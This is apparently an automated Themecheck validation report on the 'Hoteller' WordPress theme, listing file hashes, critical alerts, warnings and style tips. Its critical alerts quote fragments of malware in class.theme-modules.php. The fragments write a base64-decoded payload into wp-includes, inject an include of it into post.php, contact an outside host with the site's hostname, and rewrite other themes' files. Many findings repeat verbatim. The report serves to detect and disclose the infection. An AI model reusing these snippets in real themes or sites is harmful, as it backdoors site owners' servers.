0
Validation results

Hoteller

Hoteller

WordPress 5.2.3 theme
0
  • THEME TYPEWordPress theme 5.2.3
  • FILE NAMEhoteller.zip
  • FILE SIZE8485624 bytes
  • MD5926b5579d701c230c9b144a6eff7326d
  • SHA1fad91e0a2650806ef85c72dad6644b08de52dd77
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, HTML, XML, Bitmap images, Adobe Illustrator
  • THEME URIhttps://themes.themegoods.com/hoteller/landing
  • VERSION1.1
  • CREATION DATE2019-09-10
  • LAST FILE UPDATE2019-09-10
  • LAST VALIDATION2019-09-10 01:00
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php. 5: ini_set('display_errors', 0);
  2. Security breaches : Use of base64_decode() Found base64_decode in file class.theme-modules.php. 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )95: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  3. Malware : Operations on file system file_get_contents was found in the file parsers.php 66: $success = $dom->loadXML( file_get_contents( $file ) );296: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {file_get_contents was found in the file parsers.php 66: $success = $dom->loadXML( file_get_contents( $file ) );296: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {fopen was found in the file parsers.php 451: $fp = $this->fopen( $file, 'r' );675: function fopen( $filename, $mode = 'r' ) {678: return fopen( $filename, $mode );fclose was found in the file parsers.php 498: $this->fclose($fp);693: function fclose( $fp ) {696: return fclose( $fp );fopen was found in the file parsers.php 451: $fp = $this->fopen( $file, 'r' );675: function fopen( $filename, $mode = 'r' ) {678: return fopen( $filename, $mode );fopen was found in the file parsers.php 451: $fp = $this->fopen( $file, 'r' );675: function fopen( $filename, $mode = 'r' ) {678: return fopen( $filename, $mode );fclose was found in the file parsers.php 498: $this->fclose($fp);693: function fclose( $fp ) {696: return fclose( $fp );fclose was found in the file parsers.php 498: $this->fclose($fp);693: function fclose( $fp ) {696: return fclose( $fp );file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);
  4. Malware : Network operations curl_init was found in the file envato.lib.php 95: $ch = curl_init($url);curl_exec was found in the file envato.lib.php 106: $data = curl_exec($ch);
  5. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was hoteller-elementor.zip motopress-hotel-booking.zip envato-market.zip ._hoteller-elementor.zip ._envato-market.zip ._motopress-hotel-booking.zip.
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are hoteller, framed.
  3. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  4. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  5. Screenshot : Screenshot fileBad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  5. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  6. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  7. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  8. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  9. Use of includes : Use of include or requireThe theme appears to use include or require : class-kirki-control-fontawesome.php 42: include( $json_path ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : test-kirki-add_config.php 9: require_once( ABSPATH . WPINC . '/class-wp-customize-manager.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-kirki-helper.php 87: require_once( ABSPATH . '/wp-admin/includes/file.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : wordpress-importer.php 626: require_once( ABSPATH . 'wp-admin/includes/post.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : config.lib.php 46: require_once(ABSPATH . 'wp-admin/includes/file.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 48: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes